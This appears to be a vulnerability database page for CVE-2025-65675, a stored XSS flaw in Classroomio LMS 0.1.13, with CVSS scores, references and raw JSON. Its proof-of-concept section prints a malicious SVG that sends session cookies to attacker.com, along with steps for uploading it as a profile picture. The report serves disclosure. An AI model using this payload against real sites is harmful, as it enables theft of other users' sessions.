Security Vulnerability Report
CVE-2025-65675 CVSS 5.4 MEDIUM

Published: 2025-11-26 19:15:48
Last Modified: 2025-12-05 14:12:39

Description

Stored cross-site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG profile pictures.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:classroomio:classroomio:0.1.13:*:*:*:*:*:*:* - VULNERABLE
Classroomio LMS 0.1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- PoC: Malicious SVG file for CVE-2025-65675 -->
<!-- This SVG contains embedded JavaScript that will execute when viewed in browser -->
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    // Steal session cookies and send to attacker-controlled server
    var cookies = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookies), true);
    xhr.send();
    // Alternative: Display alert for demonstration
    alert('XSS Vulnerability - CVE-2025-65675');
    // DOM manipulation example
    console.log('Stolen data:', cookies);
  </script>
  <circle cx="100" cy="100" r="80" fill="red" />
  <text x="50" y="110" font-size="20">Malicious SVG</text>
</svg>
<!--
Usage:
1. Save this code as malicious.svg
2. Upload as profile picture in Classroomio LMS
3. When other users view your profile, the script executes
-->

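References

http://classroomio.com (Product)
https://github.com/classroomio/classroomio (Product)
https://github.com/Rivek619/CVE-2025-65675 (Exploit, Third Party Advisory)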

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65675", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:48.313", "lastModified": "2025-12-05T14:12:39.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stored Cross site scripting (XSS) vulnerability in Classroomio LMS 0.1.13 allows authenticated attackers to execute arbitrary code via crafted SVG profile pictures."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:classroomio:classroomio:0.1.13:*:*:*:*:*:*:*", "matchCriteriaId": "7C6D9D0E-58A9-4468-90E2-3717E4632BF0"}]}]}], "references": [{"url": "http://classroomio.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Rivek619/CVE-2025-65675", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, 
{"url": "https://github.com/classroomio/classroomio", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Rivek619/CVE-2025-65675", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}